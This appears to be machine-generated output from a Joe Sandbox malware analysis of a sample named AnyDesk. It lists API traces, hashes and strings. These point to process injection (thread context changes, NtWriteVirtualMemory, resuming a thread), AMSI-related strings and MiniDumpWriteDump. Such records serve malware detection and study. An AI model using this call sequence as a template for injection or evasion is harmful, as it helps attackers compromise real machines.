2b373d1-2b373e1 SysFreeString 5078->5092 5079->5068 5080->5075 5081->5075 5083->5075 5084->5075 5085->5086 5086->5077 5086->5078 5092->5091 5092->5092
            APIs
            • SysFreeString.OLEAUT32(?), ref: 02B373DA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: FreeString
            • String ID: H
            • API String ID: 3341692771-2852464175
            • Opcode ID: 1946c049c70daefd3c09ecf7c25b640189c8669a446e2680bf3b111ded301c30
            • Instruction ID: d2b6e341f6257bc2cb6e1fb3c362ac53a734f900edb810b4004e58faab70ee55
            • Opcode Fuzzy Hash: 1946c049c70daefd3c09ecf7c25b640189c8669a446e2680bf3b111ded301c30
            • Instruction Fuzzy Hash: E7B1C4B5A01608DFDB15CF99D880A9DFBF2FF8A314F1485A9E845AB360DB30A845DF50

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 5094 2b2e3fc-2b2e40c 5095 2b2e42b-2b2e42f 5094->5095 5096 2b2e40e-2b2e4fc call 2b2e3fc 5094->5096 5098 2b2e431-2b2e436 5095->5098 5099 2b2e438-2b2e444 VariantInit 5095->5099 5101 2b2e447-2b2e460 5098->5101 5099->5101 5103 2b2e462 5101->5103 5104 2b2e470-2b2e475 5101->5104 5105 2b2e464-2b2e467 5103->5105 5106 2b2e47c-2b2e483 5103->5106 5104->5106 5107 2b2e477-2b2e47a 5104->5107 5105->5106 5111 2b2e469-2b2e46c 5105->5111 5109 2b2e4c7-2b2e4d8 5106->5109 5110 2b2e485-2b2e492 call 2b37545 5106->5110 5107->5106 5108 2b2e49d-2b2e4a9 call 2b32ea4 5107->5108 5119 2b2e4c2 call 2b2dc98 5108->5119 5120 2b2e4ab-2b2e4c0 5108->5120 5117 2b2e4da-2b2e4ea call 2b2e80c call 2b2e3e0 5109->5117 5118 2b2e4ef 5109->5118 5115 2b2e498-2b2e49b 5110->5115 5111->5106 5114 2b2e46e 5111->5114 5114->5108 5115->5109 5117->5118 5119->5109 5120->5109
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: InitVariant
            • String ID:
            • API String ID: 1927566239-0
            • Opcode ID: b508999e57487f79505b651a55e1a4868dd91aa46921b10e203c3e372f7e9447
            • Instruction ID: 1eaa7a610f5378385f7c718e2228f99dfeaaac8337b658d3f0d16a8350c09200
            • Opcode Fuzzy Hash: b508999e57487f79505b651a55e1a4868dd91aa46921b10e203c3e372f7e9447
            • Instruction Fuzzy Hash: A63152716003289BEB11DFAAC884AAE77E8EB0D304F4845E5F91DD7150D734FA58CBA1

            Control-flow Graph

            APIs
              • Part of subcall function 02B381CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B3823C,?,?,00000000,?,02B37A7E,ntdll,00000000,00000000,02B37AC3,?,?,00000000), ref: 02B3820A
              • Part of subcall function 02B381CC: GetModuleHandleA.KERNELBASE(?), ref: 02B3821E
              • Part of subcall function 02B38274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B382FC,?,?,00000000,00000000,?,02B38215,00000000,KernelBASE,00000000,00000000,02B3823C), ref: 02B382C1
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B382C7
              • Part of subcall function 02B38274: GetProcAddress.KERNEL32(?,?), ref: 02B382D9
              • Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC
              • Part of subcall function 02B38338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B383C2), ref: 02B383A4
            • FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
            • String ID:
            • API String ID: 1478290883-0
            • Opcode ID: 30c7d4c2d27eb3ae798cd7ff5d543b29742a4a6cf9a098f2c63a5edf81d07e9e
            • Instruction ID: 8601dfc06aec5363dc7fe73c033588e07800b6df05eb57c881bed1f4bb5efc1e
            • Opcode Fuzzy Hash: 30c7d4c2d27eb3ae798cd7ff5d543b29742a4a6cf9a098f2c63a5edf81d07e9e
            • Instruction Fuzzy Hash: 222178B1784314AFE701FBB4DC12B5EB7EAEB04700F5144E0BA08E7690DE74A905AE19
            APIs
            • CLSIDFromProgID.OLE32(00000000,?,00000000,02B36DB9,?,?,?,00000000), ref: 02B36D99
              • Part of subcall function 02B24C60: SysFreeString.OLEAUT32(02B3F4A4), ref: 02B24C6E
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: FreeFromProgString
            • String ID:
            • API String ID: 4225568880-0
            • Opcode ID: 1ab93a9e6080fde90e68277f42bde56b27881d97e0193af9478b38d72f968d9e
            • Instruction ID: 7dffcfd7a88d8f505e5388477e8025d78af3dfab694d1818e3dcbbf5672c7dd2
            • Opcode Fuzzy Hash: 1ab93a9e6080fde90e68277f42bde56b27881d97e0193af9478b38d72f968d9e
            • Instruction Fuzzy Hash: C8E0ED35200318BBE312EB66EC41D8E7BADDF8A750B9204F1F90493A10EA31AE088C64
            APIs
            • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25886
              • Part of subcall function 02B25ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4E790), ref: 02B25AE8
              • Part of subcall function 02B25ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B06
              • Part of subcall function 02B25ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4E790), ref: 02B25B24
              • Part of subcall function 02B25ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25B42
              • Part of subcall function 02B25ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B8B
              • Part of subcall function 02B25ACC: RegQueryValueExA.ADVAPI32(?,02B25D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25BD1,?,80000001), ref: 02B25BA9
              • Part of subcall function 02B25ACC: RegCloseKey.ADVAPI32(?,02B25BD8,00000000,?,?,00000000,02B25BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25BCB
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Open$FileModuleNameQueryValue$Close
            • String ID:
            • API String ID: 2796650324-0
            • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
            • Instruction ID: 062a1001addb9ae27a5172b319f55340a8bff66b5df012d8c99e679a7deb1b4a
            • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
            • Instruction Fuzzy Hash: FFE06D71A103248FCB24DE9CC8C0B8633D8AB08750F440AA1EC68CF246D7B0D9588BD0
            APIs
            • GetFileAttributesA.KERNEL32(00000000,?,02B4041F,ScanString,02BA7380,02B4B7B8,OpenSession,02BA7380,02B4B7B8,ScanString,02BA7380,02B4B7B8,UacScan,02BA7380,02B4B7B8,UacInitialize), ref: 02B27E67
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AttributesFile
            • String ID:
            • API String ID: 3188754299-0
            • Opcode ID: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
            • Instruction ID: 86336ec6bf3ce39b4e4b35ba45aac498f0027d27ac03b264e20274b46391a92e
            • Opcode Fuzzy Hash: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
            • Instruction Fuzzy Hash: 76C08CB02013300A5A6079BC2CC4289528E8B082383640AE1A43CD62E2DB2A98AE3838
            APIs
            • timeSetEvent.WINMM(00002710,00000000,02B4C350,00000000,00000001), ref: 02B4C36C
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Eventtime
            • String ID:
            • API String ID: 2982266575-0
            • Opcode ID: 73e2e0bdc75c960d3990fdf965297bc3587b52470fb3f5dc485621ef01bdaa4e
            • Instruction ID: 4973d69f8ed4625c20935bf3e89b4af0f3562350cda12dc0f4d7493c007e3a00
            • Opcode Fuzzy Hash: 73e2e0bdc75c960d3990fdf965297bc3587b52470fb3f5dc485621ef01bdaa4e
            • Instruction Fuzzy Hash: 25C092F2B913003AFA109BA56CC6F371A9DD709B54F204592B708EE2C1D6F76C145E68
            APIs
            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 8e5068d190c6880fb20af85d3ec8039fdd192a7cc844fda9abb26c83d6febed9
            • Instruction ID: b6b8197ba888c0be38c5434dccf5b3795854f7d045cb0ed581840512da02e2cd
            • Opcode Fuzzy Hash: 8e5068d190c6880fb20af85d3ec8039fdd192a7cc844fda9abb26c83d6febed9
            • Instruction Fuzzy Hash: 72F06DF0B513809FDB09CFB999413157BF6E78A384F1085BDE609DB399E7B184058B00
            APIs
            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B22000), ref: 02B216A4
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: b81990c909d6ee26e6fa0670b5724d775caa630fde6150515758164f124ea80e
            • Instruction ID: cb0fd669d8be9e044b956042f291e2561a6e25cc6ac3a475bc0d76ca925b8310
            • Opcode Fuzzy Hash: b81990c909d6ee26e6fa0670b5724d775caa630fde6150515758164f124ea80e
            • Instruction Fuzzy Hash: 1BF02EF2B107A46FDB218F4E9C80B82BB98FB10360F084179FA0C9B340C370A8108B94
            APIs
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B21FE4), ref: 02B21704
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: 90489a79f99d41b3a82ff7b5f23659c7aa944c223abc3ee1061d73448a2f30b0
            • Instruction ID: 8cbfec0f996193e03a806ee7fb2220ede049aef56a2eb4c5b2739aeb13790da6
            • Opcode Fuzzy Hash: 90489a79f99d41b3a82ff7b5f23659c7aa944c223abc3ee1061d73448a2f30b0
            • Instruction Fuzzy Hash: C2E0CDB53203216FDB105F7D5D407167BDCEB94754F1444B5F54DDB253D260E8188B60
            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B3ADA3,?,?,02B3AE35,00000000,02B3AF11), ref: 02B3AB30
            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B3AB48
            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B3AB5A
            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B3AB6C
            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B3AB7E
            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B3AB90
            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B3ABA2
            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B3ABB4
            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B3ABC6
            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B3ABD8
            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B3ABEA
            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B3ABFC
            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B3AC0E
            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B3AC20
            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B3AC32
            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B3AC44
            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B3AC56
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
            • API String ID: 667068680-597814768
            • Opcode ID: f44e5aadfc2c09ff196f578a2602226077dddae26d7f82495cb5b9a0973655ed
            • Instruction ID: 9440d2ad01d7d727e12a63cec072b37112e87186ae8fa54f539e99317dcda417
            • Opcode Fuzzy Hash: f44e5aadfc2c09ff196f578a2602226077dddae26d7f82495cb5b9a0973655ed
            • Instruction Fuzzy Hash: C6315EB0A85360AFFF02EFB4D886A6C77A9EB16740B500CE1B445CF214EB74A804DF11
            APIs
              • Part of subcall function 02B389D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA
            • GetThreadContext.KERNEL32(00000000,02BA7424,ScanString,02BA73A8,02B3A93C,UacInitialize,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,UacInitialize,02BA73A8), ref: 02B39602
              • Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC
            • SetThreadContext.KERNEL32(00000000,02BA7424,ScanBuffer,02BA73A8,02B3A93C,ScanString,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,00000000,-00000008,02BA74FC,00000004,02BA7500), ref: 02B3A317
            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02BA7424,ScanBuffer,02BA73A8,02B3A93C,ScanString,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,00000000,-00000008,02BA74FC), ref: 02B3A324
              • Part of subcall function 02B3894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,UacScan), ref: 02B38960
              • Part of subcall function 02B3894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B3897A
              • Part of subcall function 02B3894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize), ref: 02B389B6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: LibraryThread$ContextFree$AddressLoadMemoryProcResumeVirtualWrite
            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
            • API String ID: 1342636540-51457883
            • Opcode ID: 6064f0e44fb6e7bb9273f32f2ba9efdecbaf689aa3e994ca60ba0a7784b8e5ab
            • Instruction ID: cfbbfce1bcc954bc86bc42f25bacaafbd6ed6a1d73d57709c33100b395c9f735
            • Opcode Fuzzy Hash: 6064f0e44fb6e7bb9273f32f2ba9efdecbaf689aa3e994ca60ba0a7784b8e5ab
            • Instruction Fuzzy Hash: 7EE2EE35B402289FDB12FB64DC85BCE73BAAF89300F5141E1E149ABA54DE30AE4D9F51
            APIs
              • Part of subcall function 02B389D0: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02BA738C,Function_0000662C,00000004,02BA739C,02BA738C,05F5E103,00000040,02BA73A0,74F60000,00000000,00000000), ref: 02B38AAA
            • GetThreadContext.KERNEL32(00000000,02BA7424,ScanString,02BA73A8,02B3A93C,UacInitialize,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,UacInitialize,02BA73A8), ref: 02B39602
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: ContextFreeLibraryThread
            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
            • API String ID: 1077026627-51457883
            • Opcode ID: c58510df845c5c587b4809ec1ff71dd8e36ad8aea48d46c934bf2e1bd060921c
            • Instruction ID: e0ce9ff297b3628f66c8a662cbd7d31388f3a223a7b404c6ae5b79309b694ba5
            • Opcode Fuzzy Hash: c58510df845c5c587b4809ec1ff71dd8e36ad8aea48d46c934bf2e1bd060921c
            • Instruction Fuzzy Hash: 69E2EE35B402289FDB12FB64DC85BCE73BAAF89300F5141E1E149ABA54DE30AE4D9F51
            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25925
            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B2593C
            • lstrcpynA.KERNEL32(?,?,?), ref: 02B2596C
            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B259D0
            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A06
            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A19
            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A2B
            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000,02B4E790), ref: 02B25A37
            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C,02B20000), ref: 02B25A6B
            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B2737C), ref: 02B25A77
            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B25A99
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
            • String ID: GetLongPathNameA$\$kernel32.dll
